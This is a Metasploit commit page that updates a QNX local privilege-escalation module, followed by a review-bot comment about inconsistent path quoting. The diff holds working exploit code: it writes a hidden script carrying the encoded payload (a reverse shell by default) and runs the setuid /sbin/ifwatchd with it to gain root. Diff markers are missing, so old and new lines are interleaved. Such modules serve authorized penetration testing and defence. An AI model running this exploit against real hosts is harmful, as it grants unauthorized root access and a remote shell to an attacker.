
Land #9745, Update QNX iwatchd to use newer APIs

busterb committed Oct 6, 2018
2 parents c9ebe5a + 89b6aaf commit 3d507250b04b48f448856823a54650a0ee9f8319
Showing with 16 additions and 19 deletions.
  1. +16 −19 modules/exploits/qnx/local/ifwatchd_priv_esc.rb
@@ -6,6 +6,7 @@
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::FileDropper
@@ -61,15 +62,19 @@ def initialize(info = {})
'PAYLOAD' => 'cmd/unix/reverse_awk'
}
))
register_options([
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
register_advanced_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def ifwatchd_path
'/sbin/ifwatchd'
end
def base_dir
datastore['WritableDir']
end
def check
unless setuid? ifwatchd_path
vprint_error "#{ifwatchd_path} is not setuid"
@@ -80,25 +85,20 @@ def check
CheckCode::Detected
end
def base_dir
datastore['WritableDir']
end
def is_root?
id = cmd_exec 'id'
(id.include?('uid=0') && id.include?('root'))
end
def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
script_path = "#{base_dir}/.#{rand_text_alphanumeric rand(10..15)}"
script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
print_status 'Writing interface arrival event script...'
cmd_exec "echo '#!/bin/sh' > #{script_path}"
@@ -107,15 +107,12 @@ def exploit
exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
cmd_exec "echo \"#{exp}\" >> #{script_path}"
cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
register_file_for_cleanup script_path
cmd_exec "chmod +x '#{script_path}'"
print_status "Executing #{ifwatchd_path}..."
interface = 'lo0'
cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
Rex.sleep 5
cmd_exec "rm -f '#{script_path}'"
end
end
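Review bot: `script_path` is interpolated unquoted in the `echo ... > #{script_path}` and `>> #{script_path}` writes inside `exploit`, while the `chmod +x '#{script_path}'` and `-A '#{script_path}'` lines quote it. Because `base_dir` comes straight from the `WritableDir` datastore option, a value containing whitespace would make those redirections write to a different path than the one passed to `register_file_for_cleanup`, leaving a stray file on the host under test. Quote it consistently, e.g. `cmd_exec "echo '#!/bin/sh' > '#{script_path}'"`, or validate `WritableDir` before building the path. The page does not mark which of the doubled lines are old or new, and the part of `exploit` between the last two hunks is not shown, so this applies to whichever of these writes remain on the new side.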
